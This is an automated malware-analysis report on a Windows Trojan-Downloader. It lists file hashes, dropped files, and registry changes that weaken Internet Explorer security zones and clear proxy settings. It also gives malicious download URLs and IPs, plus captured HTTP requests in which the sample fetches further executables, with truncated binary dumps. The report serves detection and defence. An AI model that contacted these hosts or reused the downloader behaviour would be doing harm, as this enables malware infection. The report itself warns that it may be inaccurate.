Trojan.Generic.14783327_be544a694c

by malwarelabrobot on August 15th, 2015 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Generic.14783327 (B) (Emsisoft), Trojan.Generic.14783327 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: be544a694c1caa48e6ac2df4f6421ec3
SHA1: 8a2e9233de4f4e0cd561acf3f787fa2c304f6899
SHA256: 097aad9946dae59bac73d27b63e9f809335e4ed5c370e5c7b1598b3add1d67cc
SSDeep: 12288:QhuzVyM/BisrxyEi64r/SEmUnz9KywQ7Kd21CgNbL8T:zmEijr/S1qz9K5kn
Size: 503296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 18:16:46
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

uuuyunbo_53_1248.exe:1536
%original file name%.exe:652

The Trojan injects its code into the following process(es):

Setup_95101248.exe:1596

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process uuuyunbo_53_1248.exe:1536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The process Setup_95101248.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)

The process %original file name%.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)

Registry activity

The process uuuyunbo_53_1248.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C EA D3 A1 DC 1D 84 10 AF 4C 78 AE 5C 53 D0 AA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Setup_95101248.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 48 E5 57 5E C5 41 D8 3B 33 2B DA A0 C2 68 43"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2A 76 C5 6A 1D A5 78 16 E0 F3 B3 3E E5 E9 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
f453688934086e01ed59d73ccfcd2c04 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\XxShow\XxTongji.dll
33ec04738007e665059cf40bc0f0c22b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\BgWorker.dll
4e09ca0312aeaa4029d5cd50cb99871a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\CheckEnv.dll
e4ec95271ff1bcebab49bdfed6817a22 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\SkinBtn.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\System.dll
418a34a689d5f9bb85fc951168749edb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WebCtrl.dll
f0cb331dd4bd92a6ebce45e7cd1cf5ef c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WndProc.dll
ab73c0c2a23f913eabdc4cb24b75cbad c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\nsDialogs.dll
0a004e3415d3d4621b427d68650e3679 c:\Setup_95101248.exe
728d0bcfaf8ce89b1983bbd7891cf9f8 c:\uuuyunbo_53_1248.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United Kingdom)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 520192 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 524288 430080 428032 5.37247 e771329ce39b039ce5a1146ac018b9ec
.rsrc 954368 77824 74240 4.59261 0bcbc538b675834e4553c6070205a4c5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://bgp5.yandui.com/xlxc/Setup_95101248.exe
hxxp://d.juezhao123.com/setup/setup_30004.exe 58.222.24.189
hxxp://down.shm520.com/xlxc/Setup_95101248.exe 183.131.193.67
xiazai.lianmengqudao1.com 58.220.3.155
down.shijiakai.net 58.220.21.68
www.jiuhuabuy.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET CURRENT_EVENTS Potential Fast Flux Rogue Antivirus (Setup_245.exe)
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 14 Aug 2015 19:34:12 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s...........'........
......h'...........................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]....'.......(...v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /xlxc/Setup_95101248.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: down.shm520.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Aug 2015 11:44:19 GMT
Content-Type: application/octet-stream
Content-Length: 1363160
Last-Modified: Wed, 29 Jul 2015 19:29:18 GMT
Connection: keep-alive
ETag: "55b9298e-14ccd8"
X-Server-IP: 183.131.193.67
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\..........!1.......p....@.........................
.0...............................................s....... ............
......@............................................................p..
.............................text...8Z.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]........ .......v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h>[email protected]>[email protected]
...Pr@..}..e..9}[email protected]........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
[email protected]@..u....E..9}[email protected].}.j
[email protected]@[email protected] ...Pj.h`6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Setup_95101248.exe_1596:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
`.reloc
KERNEL32.DLL
MsgWaitForMultipleObjects
BgWorker.dll
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
<VeriSign Class 3 Public Primary Certification Authority - G50
#hXXp://logo.verisign.com/vslogo.gif0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
Could not resolve %s: %s; %s
%s:%d
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Re-using existing connection! (#%ld) with host %s
%s://%s
IDN support not present, can't parse Unicode domains
<url> malformed
:]://%[^
[^:]:%[^
Protocol %s not supported or disabled in libcurl
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
No URL set!
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
[^?&/:]://%c
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
WARNING: failed to save cookies in %s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
Send failure: %s
Recv failure: %s
[%s %s %s]
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getsockname() failed with errno %d: %s
getpeername() failed with errno %d: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
TCP_NODELAY set
Could not set TCP_NODELAY: %s
couldn't connect to %s at %s:%d
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Unknown error %d (%#x)
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Internal error removing splay node = %d
Internal error clearing splay node = %d
%d.%d.%d.%d
The requested URL returned error: %d
@I.po
6-q}k
version=1.0.1.8
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
in.html?
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1248.exe
1638648
-2067134396
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
95101248.exe
c:\Setup_95101248.exe
D:\Program Files\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
Setup_95101248.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
352650550
1245428
1114338
1114320
1573190
2162906
1376468
95101248
1507518
1573146
1507522
1507538
1048780
1442126
1573052
1835232
1376520
1638642
1310942
1310970
722076749
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
2.0.0.0

Setup_95101248.exe_1596_rwx_10004000_00001000:

callback%d

uuuyunbo_53_1248.exe_1536:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u*@Sj%
t.Gj:W
j.Yf;
_tcPVj@
.PjRW
Internal error clearing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
smtp
;type=%c
Send failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
